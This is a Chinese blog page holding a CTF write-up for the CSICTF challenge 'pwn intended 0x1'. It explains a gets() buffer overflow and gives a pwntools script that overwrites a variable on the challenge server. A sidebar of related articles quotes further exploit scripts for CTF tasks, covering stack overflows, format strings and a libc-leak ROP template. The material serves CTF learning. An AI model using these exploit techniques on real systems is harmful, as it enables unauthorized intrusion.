【CSICTF】pwn intended 0x1 WriteUp

最新推荐文章于 2021-05-13 12:42:19 发布
最新推荐文章于 2021-05-13 12:42:19 发布
阅读量186 收藏
点赞数
文章标签: CTF
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.youkuaiyun.com/tqydyqt/article/details/107459586
版权


一道pwn的签到题

v4的长度为0x30-4,使用的是gets函数读取输入,所以可以溢出
只要满足v5不等于0就可以拿到flag,于是通过溢出修改v5的值即可

from pwn import *
from LibcSearcher import *
from struct import pack

context.os='linux'
context.arch='amd64'
context.log_level='debug'

sd=lambda x:io.send(x)
sl=lambda x:io.sendline(x)
ru=lambda x:io.recvuntil(x)
rl=lambda :io.recvline()
ra=lambda :io.recv()
rn=lambda x:io.recv(x)
sla=lambda x,y:io.sendlineafter(x,y)

io=remote('chall.csivit.com',30001)
#io=process('./pwn-intended-0x1')
elf=ELF('./pwn-intended-0x1')

ra()
sl('a'*0x30)

io.interactive()

古月浪子
关注
pwnable.kr-fix
r00tnb的博客
02-28 910
前言 看似简单的改代码题,但是还是需要强大的汇编知识。花了很长时间,主要是自己对指令不是很熟悉。另外pwnable.kr的练习我会在另一个博客http://www.ktstartblog.top持续更新欢迎大家来踩。 分析 先分析源码fix.c #include <stdio.h> // 23byte shellcode from http://shell-storm...
Pwn
bluestar628的博客
07-11 2550
Pwn1拿到程序IDA分析发现就是一个输入字符串,长度大于0x500就直接执行cat flag。虽然溢出了,但是和溢出没有太大关系所以利用代码如下:from pwn import * p = remote ("139.224.220.67" ,30004) payload = 'a'*0x501 p.sendline(payload) p.interactive()Pwn2打开IDA分析,是一个经...
CSICTF】Secret Society WriteUp
古月浪子的博客
07-23 321
这道题解题人数明显比前面三道题少了很多,不知道为啥 =_= 我感觉还是比较简单的 根本不需要读懂它到底在搞什么,只需要知道,我们让puts v5的时候连带着把s也输出出来就好了 其实这里的处理就是从换行符截断,然后在后面加上“,we are everywhere.”,因此,把v5的128字节写满即可。后面读flag的时候会覆盖掉,可以成功输出 from pwn import * from LibcSearcher import * from struct import pack context.os=.
CSICTF】RicknMorty WriteUp
古月浪子的博客
07-23 236
第一道逆向题 大致流程就是,随机给你出几道题,题目是这样的:给你2个不是太大的数,求最小公因数,然后计算最小公因数+3的阶乘 所有题目回答正确并且用时小于30秒就能获得flag 讲真的,这种程度的题目我室友应该能2秒一道口算出结果 我算不了这么快,还是老老实实上python脚本吧 这里借用一下pwn题的模板 from pwn import * from LibcSearcher import * from struct import pack context.os='linux' contex.
CSICTFpwn intended 0x3 WriteUp
古月浪子的博客
07-23 200
和第二题不同了,这次是需要溢出覆盖ret addr 可以看到后门函数,地址是0x4011CE,并且程序没有开启PIE from pwn import * from LibcSearcher import * from struct import pack context.os='linux' context.arch='amd64' context.log_level='debug' sd=lambda x:io.send(x) sl=lambda x:io.sendline(x) ru=lamb.
CSICTF 部分逆向wp
苗_的博客
07-29 437
RicknMorty 整个看下来逻辑就是,随机出现两个数,找到他们的最小公因数,然后+3求阶乘。(在30s内算完所有即可) (当时没有用脚本,直接计算器走一波就出来了) 附上脚本: from pwn import * from LibcSearcher import * from struct import pack context.os='linux' context.arch='amd64' context.log_level='debug' sd=lambda x:io.send(x) s
第五届蓝帽杯_2021_chall
05-13
第五届蓝帽杯_2021_chall,沙盒机制的pwn题。
CSICTF】Global Warming WriteUp
古月浪子的博客
07-23 241
一道格式化字符串漏洞的题,以前遇到这种题都是手撸payload,今天来试试pwntools自带的工具 由于读取字符数有限制,不能栈溢出,但是发现程序直接将读取的字符串printf,导致可以利用格式化字符串漏洞 %n可以将已输出的字符数当作4字节整数写入指向的内存地址,同理%hhn可以写入单字节整数 利用这一点去改写admin的值,即可绕过检测 如果是有回显的题目,通常用aaaa%p-%p-%p-%p-%p…来找偏移,看到0x61616161即可确定偏移量 用%xc来输出x个字符,这样便可控制写入的值.
BUUCTF pwn ez_pz_hackover_2016(write up)
qq_44768749的博客
08-23 524
BUUCTF pwn ez_pz_hackover_20160x01 文件分析0x02 运行0x03 IDA0x04 思路0x05 exp 0x01 文件分析 没有不可执行栈和段上的读写保护。 0x02 运行 输入name后发现上面还有一个地址。 0x03 IDA 若输入crashme,即可进入vlun函数,主要的漏洞点在这个函数内部的,chall栈的大小很大,足够写 入shellcode,之后的vuln函数会将name的数据复制到vuln的栈上面,而且复制的数据量远远大于栈的 长度,会造
pwn -- 沙盒机制详解
lifanxin的博客
05-13 6699
沙盒机制详解概述开启沙盒的两种方式prctl函数调用seccomp库函数使用seccomp-tools识别沙盒两道例题pwnable_asm参考博客总结 概述   沙盒机制也就是我们常说的沙箱,英文名sandbox,是计算机领域的虚拟技术,常见于安全方向。一般说来,我们会将不受信任的软件放在沙箱中运行,一旦该软件有恶意行为,则禁止该程序的进一步运行,不会对真实系统造成任何危害。   在ctf比赛中,pwn题中的沙盒一般都会限制execve的系统调用,这样一来one_gadget和system调用都不好使,只
CTFshow——Pwn(1)
Y_peak的博客
02-24 481
CTFshow——Pwn(1) 有点懒不想写write up了。只有exploit。 PWN签到题 from pwn import * p = remote('xxx',xxx) p.interactive() pwn02 from pwn import * p =remote("pwn.chall.ctf.show",28006) p.sendline('a'*(0x9+4) + p32(0x0804850F)) p.interactive() pwn03 from pwn import * from
从一道简单的pwn题 认识 栈转移
qq_41071646的博客
04-27 553
这个题 好像是 bugku的 但是好像这个题 给换了 这个是 64位的程序 这个题 难搞点就是 栈空间不够 可以看的出来 我们s的地方是 rbp-0x10的地方 那么 返回地址 应该就是 rbp-0x18的地址 如果我们想把这个搞定 那么 要考虑一下 栈转移 栈转移 有很多高级的用法 这里 就浅显的说一些简单的 栈转移 栈转移 其实就是利用的是这两个...
攻防世界pwn新手区writeup
a370793934的专栏
11-27 1081
get_shell #coding = utf-8 from pwn import * context.log_level = 'debug' io = remote('111.198.29.45', 54766) io.sendline('ls') io.sendline('cat flag') io.interactive() flag: cyberpeace{c2b358...
CSICTF】Esrever WriteUp
古月浪子的博客
07-23 607
这道题看起来不像是逆向,更像是密码学 =_= import random # TODO: Remember to remove real flag before deploying flag = 'csictf{fake_flag}' key = 'fake_key' def enc1(text): r = random.randint(1,25) return bytes.fromhex(''.join([hex(((ord(i) - ord('a') - r) % 26) + o.
CSICTF】pydis2ctf WriteUp
古月浪子的博客
07-23 669
这题我感觉我做的有问题,最后虽然答案是勉强凑出来了 题目给了3个附件 cipher1: 2 0 LOAD_CONST 1 ('') 2 STORE_FAST 1 (ret_text) 3 4 LOAD_GLOBAL 0 (list) 6 LOAD_FAST 0 (text) .
小姐姐炫酷唯美引导页.zip
最新发布
04-30
小姐姐炫酷唯美引导页.zip
scratch少儿编程逻辑思维游戏源码-让它们跳起来.zip
04-30
scratch少儿编程逻辑思维游戏源码-让它们跳起来.zip
少儿编程scratch项目源代码文件案例素材-战斗塔防.zip
04-30
少儿编程scratch项目源代码文件案例素材-战斗塔防.zip
前端开发_Vue全家桶_vw适配_vux组件库_mescroll滚动_fastclick优化_mock模拟_less预处理器_移动端脚手架_基于Vue2和Webpack3构建的移动.zip
04-30
前端开发_Vue全家桶_vw适配_vux组件库_mescroll滚动_fastclick优化_mock模拟_less预处理器_移动端脚手架_基于Vue2和Webpack3构建的移动
pwn1_sctf_2016
02-09
### 关于 PWN1 SCTF 2016 CTF 比赛解题报告 #### 题目概述 PWN1 SCTF 2016 是一次涉及栈溢出漏洞利用的比赛项目。参赛者需理解二进制文件执行流程以及如何通过特定输入控制程序流来实现非授权操作[^2]。 #### 漏洞分析 该挑战主要围绕栈缓冲区溢出展开。当应用程序未能正确验证用户输入长度时,攻击者可以构造恶意数据覆盖堆栈上的返回地址或其他重要变量位置。具体到此案例中,存在一处未受保护的函数调用允许外部输入直接写入固定大小的内存区域而没有任何边界检查机制。 #### 利用方法 为了成功完成这一关卡,选手们通常采用如下策略: - **寻找合适的gadget链**:由于现代操作系统普遍启用了多种防护措施(如NX位),单纯注入shellcode变得困难重重;因此需要找到一系列ROP gadgets组合起来绕过这些限制。 - **泄露 libc 地址**:考虑到目标机器上可能安装有不同版本的标准C库(libc),事先获取其基地址有助于后续精确计算所需偏移量。一种常见做法是先触发格式化字符串错误从而读取got表项中的实际映射位置[^4]。 - **构建 payload**:最终形成的载荷不仅要能够跳转至系统命令解释器(`/bin/sh`)所在处启动交互式终端会话,还要巧妙规避各种随机化技术的影响。这往往涉及到精心安排参数传递顺序并调整寄存器状态以匹配期望环境[^1]。 ```python from pwn import * # 假设已知某些关键信息... elf = ELF('vuln_binary') libc = ELF('/path/to/libc.so') # 远程连接或本地调试设置 conn = remote('target_host', port) # 发送初始输入引发泄漏 conn.sendlineafter(b'> ', b'%7$s' + cyclic(8)) leak_data = conn.recvuntil('\n').strip() # 处理泄露出的数据得到libc基址 base_addr = u64(leak_data.ljust(8, b'\x00')) - libc.symbols['puts'] log.info(f"Leaked base address: {hex(base_addr)}") # 构造用于执行/bin/sh的有效负载 payload = flat([ ... # 此处省略具体细节 ]) conn.interactive() ```
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值